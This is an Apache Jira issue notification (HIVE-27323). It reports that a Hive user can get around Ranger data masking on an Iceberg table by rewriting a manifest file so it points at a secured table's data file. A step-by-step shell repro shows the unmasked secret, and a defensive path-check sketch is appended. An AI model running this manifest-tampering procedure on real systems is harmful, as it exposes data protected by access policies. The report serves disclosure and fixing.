[ https://issues.apache.org/jira/browse/HIVE-27323?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Denys Kuzmenko updated HIVE-27323:
----------------------------------
    Issue Type: Improvement  (was: Bug)

> Iceberg: malformed manifest file or list can cause data breach
> --------------------------------------------------------------
>
>                 Key: HIVE-27323
>                 URL: https://issues.apache.org/jira/browse/HIVE-27323
>             Project: Hive
>          Issue Type: Improvement
>          Components: Iceberg integration
>    Affects Versions: 4.0.0-alpha-2
>            Reporter: Janos Kovacs
>            Priority: Blocker
>              Labels: check, pull-request-available
>
> Set to bug/blocker instead of enhancement due to its security-related nature;
> Hive 4 should not be released without a fix for this. Please reset if needed.
>
> FYI: it's similar to HIVE-27322, but this one is based more on Iceberg's
> internals and can't just be fixed via the storage handler authorizer.
>
> Context:
> * There are some core tables with sensitive data that users can only query
> with data masking enforced (e.g. via Ranger). Let's assume this is the
> `default.icebergsecured` table.
> * An end user can only access the masked form of the sensitive data, as
> expected.
> * The users also have the privilege to create new tables in their own sandbox
> databases. Let's assume this is the `default.trojanhorse` table for now.
> * The user can create a malicious table that exposes the sensitive data
> non-masked, leading to a possible data breach.
> * Hive runs with doAs=false so that it can enforce FGAC and so that end users
> need no direct file-system access.
>
> Repro:
> * First make sure the data is secured by the masking policy:
> {noformat}
> <kinit as privileged user>
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES ('You might be allowed to see this.','You are NOT allowed to see this!');
> "
> <kinit as end user>
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +------------------------------------+--------------------------------+
> | icebergsecured.txt                 | icebergsecured.secret          |
> +------------------------------------+--------------------------------+
> | You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
> +------------------------------------+--------------------------------+
> {noformat}
> * Now let the user create the malicious table exposing the sensitive data:
> {noformat}
> <kinit as end user>
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorseviadata;
> CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string) STORED BY ICEBERG LOCATION '/some-user-writeable-location/trojanhorseviadata';
> INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder');
> "
> # Path of the secured table's data file, read from its metadata table
> SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" beeline --outputformat=csv2 --showHeader=false --verbose=false --showWarnings=false --silent=true --report=false -e "SELECT file_path FROM default.icebergsecured.files;" 2>/dev/null)
> # Locate the trojan table's current metadata file, then its manifest list
> TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null |grep metadata_location |grep -v previous_metadata_location | awk '{print $5}')
> TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION |grep "manifest-list" |cut -f4 -d\")
> hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION
> TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION)
> # Fetch the manifest file referenced by the manifest list
> TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST |jq '.manifest_path' |tr -d \")
> hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION
> TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION)
> mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig
> # Rewrite the manifest so its data file entry points at the secured file
> avro-tools tojson ${TROJAN_MANIFESTFILE}.orig |jq --arg fp "$SECURE_DATA_FILE" '.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json
> avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > ${TROJAN_MANIFESTFILE}.schema
> avro-tools fromjson --codec deflate --schema-file ${TROJAN_MANIFESTFILE}.schema ${TROJAN_MANIFESTFILE}.json > ${TROJAN_MANIFESTFILE}.new
> # Overwrite the manifest in place and query the trojan table
> hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION
> beeline -e "SELECT * FROM default.trojanhorseviadata;"
> +------------------------------------+-----------------------------------+
> | trojanhorseviadata.txt             | trojanhorseviadata.secret         |
> +------------------------------------+-----------------------------------+
> | You might be allowed to see this.  | You are not allowed to see this!  |
> +------------------------------------+-----------------------------------+
> {noformat}
>
> There are actually multiple ways to create such a table and modify the
> manifest file or list, such as reusing parts of the Iceberg code or simply
> using Spark, which needs direct end-user write access to the file system.

--
This message was sent by Atlassian Jira
(v8.20.10#820010)
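
The repro works because the rewritten manifest entry points at a data file outside the trojan table's own location. As an illustration of that condition only, and not the fix adopted for this issue, here is a minimal shell sketch that flags such paths. The function names `is_under_table_location` and `list_outside_paths` and the `/warehouse/...` path are hypothetical. The sketch assumes the location and the file paths are written in the same form (both plain paths or both full URIs). Iceberg tables may legitimately reference files outside their location, so a hit is a signal to review rather than proof of abuse.

```shell
# Hypothetical helper, not part of Hive or Iceberg: succeeds only when
# the file path ($2) lies under the table location ($1).
is_under_table_location() {
  local table_location="${1%/}"   # drop one trailing slash, if any
  local file_path="$2"
  # Reject ".." segments, which could escape the location prefix.
  case "$file_path" in
    */../*|*/..) return 1 ;;
  esac
  # Match on a whole path component, so /t/a does not match /t/ab/...
  case "$file_path" in
    "$table_location"/*) return 0 ;;
    *) return 1 ;;
  esac
}

# Hypothetical helper: read file paths from stdin, one per line, and
# print those that are NOT under the given table location.
list_outside_paths() {
  local table_location="$1" path
  while IFS= read -r path; do
    is_under_table_location "$table_location" "$path" || printf '%s\n' "$path"
  done
}

# Example with illustrative paths (the second one is made up).
printf '%s\n' \
  '/some-user-writeable-location/trojanhorseviadata/data/a.parquet' \
  '/warehouse/icebergsecured/data/b.parquet' |
  list_outside_paths '/some-user-writeable-location/trojanhorseviadata'
```

With the two illustrative paths above, only the second one is printed. In a setup like the repro, the input could be the `file_path` values that `avro-tools tojson` and `jq` extract from a manifest file.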